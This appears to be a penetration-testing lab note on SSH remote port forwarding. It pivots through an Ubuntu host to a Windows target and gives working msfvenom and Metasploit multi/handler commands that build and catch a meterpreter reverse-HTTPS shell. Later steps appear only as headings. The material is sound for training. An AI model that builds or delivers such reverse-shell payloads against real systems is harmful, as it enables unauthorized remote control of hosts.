SSH remote port forwarding
Scenario
- We CAN pivot into the Windows A host via the Ubuntu Server.
- We CAN RDP into the Windows A host
- But we canNot a reverse shell from Windows A into Attack Host
tmux env setup
tmux setenv EXTERNAL_IP_OF_PIVOT_HOST 10.129.196.1
tmux setenv INTERNAL_IP_OF_PIVOT_HOST 172.16.5.129
tmux setenv LOCAL_IP 10.10.14.118
tmux setenv WIN_IP_NET_2 172.16.5.19
Setup part 1
Creating a Windows Payload with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_https lhost=$INTERNAL_IP_OF_PIVOT_HOST -f exe -o shell.exe LPORT=8080
Configuring & Starting the multi/handler
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_https; set lhost $LOCAL_IP; set lport 8000; exploit"
Setup part 2
Transferring Payload to Pivot Host (to Victim Server - Ubuntu)
Starting Python3 Webserver on Pivot Host (on Victim Server - Ubuntu)
Downloading Payload from Windows Target
Setup part 3
on Attack Host
on Victim Server (Windows A)